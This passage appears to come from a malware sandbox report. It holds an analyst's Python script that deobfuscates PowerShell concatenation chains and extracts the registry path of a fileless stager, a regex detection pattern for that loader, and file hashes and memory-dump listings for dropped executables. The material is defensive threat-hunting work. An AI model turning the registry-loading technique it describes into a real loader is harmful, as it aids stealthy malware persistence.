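        parts.append(chr(int(m.group(1))) if m else term[1:-1])
    return "".join(parts)


def deobfuscate(cmdline: str) -> str:
    """Replace every concatenation chain in a command line with one quoted literal."""
    return _CHAIN.sub(lambda m: "'" + eval_chain(m.group(0)) + "'", cmdline)


def registry_stager_location(cmdline: str):
    """Return (hive, subkey, value) when the command loads an assembly from the
    registry via OpenSubkey(...).GetValue(...); None if that pattern is absent."""
    m = re.search(
        r"\[Microsoft\.Win32\.Registry\]::(\w+)\.OpenSubkey\('([^']*)'\)\.GetValue\('([^']*)'\)",
        deobfuscate(cmdline),
    )
    return m.groups() if m else None


def hunt_path(cmdline: str):
    """Short-form registry path to look for on other hosts, e.g. HKLM\\SOFTWARE\\name."""
    loc = registry_stager_location(cmdline)
    if loc is None:
        return None
    hive, subkey, value = loc
    return f"{HIVES.get(hive, hive)}\\{subkey}\\{value}"


if __name__ == "__main__":
    print(deobfuscate(LOADER_CMDLINE))
    print("stager value:", hunt_path(LOADER_CMDLINE))
```

The same chain folding applies to any PowerShell command line that builds strings this way, so the deobfuscate step is worth running over every powershell.exe command line in your telemetry before string-matching it; the registry lookup is specific to the Load-from-registry loader seen here.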
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Temp\tmp2F1C.tmp.bat
  Filesize: 155B
  MD5: 60cfce000a0dcea7e0d8a3b03d4fae32
  SHA1: dc2e9ec81317ab32a68d04c084049f280b3d92a4
  SHA256: 49a9166372214d123ad2b9b694c1e5b33b345eef27b06de5af686b086cdb94fd
  SHA512: 7a8b8d35be2d0620778c4988685d87fc4251141e5f4fc94cf62c7891b4ae81c2378beff66edf84ebe8aaa81614c1df60ff65a072d9118f7bdc737833879366bf

C:\Windows\Temp\tmp34F5.tmp.bat
  Filesize: 163B
  MD5: 3d78c61dc0f919cee238b2627cd85446
  SHA1: c54c142edf2744d376db5939c3f738de9728168d
  SHA256: a1f86929b73112912c86411775619ec9eaef6f27e93de4af5c72ed6199940286
  SHA512: ee70df2d5fe7b0ec96d2e2758232f33d3a6d84b4ba3b40437bbd469aca567449b2a5ca7a0229026d8a49310b9e95c7b362d7398264c4fa0dbe4df8b0be86fb2b

\Users\Admin\AppData\Local\Temp\$77-aachost.exe
  Filesize: 66KB
  MD5: f10712f4faa374be8f37668c5ebed4a6
  SHA1: bb30e941c4f91ae3178539e993abecbfd838fdb0
  SHA256: d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
  SHA512: cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac

\Users\Admin\AppData\Local\Temp\$77-install.exe
  Filesize: 163KB
  MD5: 1a7d1b5d24ba30c4d3d5502295ab5e89
  SHA1: 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
  SHA256: b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
  SHA512: 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
  Filesize: 256KB
  MD5: 18f497deffe88b6b2cff336a277aface
  SHA1: 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
  SHA256: 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
  SHA512: 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
  Filesize: 50KB
  MD5: 77a71f3a441aa3bf824967e52413bec5
  SHA1: c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
  SHA256: 1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
  SHA512: 31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b

Memory dumps (name encodes PID, sequence number and address range; size in parentheses):
memory/432-55-0x0000000000330000-0x000000000035B000-memory.dmp (172KB)
memory/432-63-0x0000000036F60000-0x0000000036F70000-memory.dmp (64KB)
memory/432-51-0x0000000000300000-0x0000000000325000-memory.dmp (148KB)
memory/432-53-0x0000000000300000-0x0000000000325000-memory.dmp (148KB)
memory/432-54-0x0000000000330000-0x000000000035B000-memory.dmp (172KB)
memory/432-62-0x000007FEBF180000-0x000007FEBF190000-memory.dmp (64KB)
memory/432-61-0x0000000000330000-0x000000000035B000-memory.dmp (172KB)
memory/480-76-0x000007FEBF180000-0x000007FEBF190000-memory.dmp (64KB)
memory/480-69-0x0000000000F50000-0x0000000000F7B000-memory.dmp (172KB)
memory/480-75-0x0000000000F50000-0x0000000000F7B000-memory.dmp (172KB)
memory/480-77-0x0000000036F60000-0x0000000036F70000-memory.dmp (64KB)
memory/488-89-0x00000000000A0000-0x00000000000CB000-memory.dmp (172KB)
memory/488-83-0x00000000000A0000-0x00000000000CB000-memory.dmp (172KB)
memory/488-91-0x0000000036F60000-0x0000000036F70000-memory.dmp (64KB)
memory/488-90-0x000007FEBF180000-0x000007FEBF190000-memory.dmp (64KB)
memory/496-98-0x0000000000520000-0x000000000054B000-memory.dmp (172KB)
memory/1636-0-0x0000000073F1E000-0x0000000073F1F000-memory.dmp (4KB)
memory/1636-1-0x00000000010A0000-0x0000000001210000-memory.dmp (1.4MB)
memory/1636-246-0x0000000073F1E000-0x0000000073F1F000-memory.dmp (4KB)
memory/2084-27-0x0000000000230000-0x0000000000276000-memory.dmp (280KB)
memory/2084-33-0x00000000002A0000-0x00000000002A6000-memory.dmp (24KB)
memory/2128-48-0x0000000140000000-0x0000000140008000-memory.dmp (32KB)
memory/2128-45-0x0000000140000000-0x0000000140008000-memory.dmp (32KB)
memory/2128-46-0x0000000076F20000-0x00000000770C9000-memory.dmp (1.7MB)
memory/2128-47-0x0000000076E00000-0x0000000076F1F000-memory.dmp (1.1MB)
memory/2128-40-0x0000000140000000-0x0000000140008000-memory.dmp (32KB)
memory/2128-41-0x0000000140000000-0x0000000140008000-memory.dmp (32KB)
memory/2128-42-0x0000000140000000-0x0000000140008000-memory.dmp (32KB)
memory/2128-43-0x0000000140000000-0x0000000140008000-memory.dmp (32KB)
memory/2292-39-0x0000000076E00000-0x0000000076F1F000-memory.dmp (1.1MB)
memory/2292-38-0x0000000076F20000-0x00000000770C9000-memory.dmp (1.7MB)
memory/2292-37-0x0000000000EB0000-0x0000000000EDA000-memory.dmp (168KB)
memory/2292-36-0x0000000000550000-0x0000000000558000-memory.dmp (32KB)
memory/2292-35-0x000000001A210000-0x000000001A4F2000-memory.dmp (2.9MB)
memory/2628-239-0x0000000000D60000-0x0000000000D76000-memory.dmp (88KB)
memory/2652-11-0x0000000000B70000-0x0000000000B82000-memory.dmp (72KB)
memory/2664-19-0x00000000010F0000-0x0000000001106000-memory.dmp (88KB)
memory/2776-245-0x0000000000C10000-0x0000000000C26000-memory.dmp (88KB)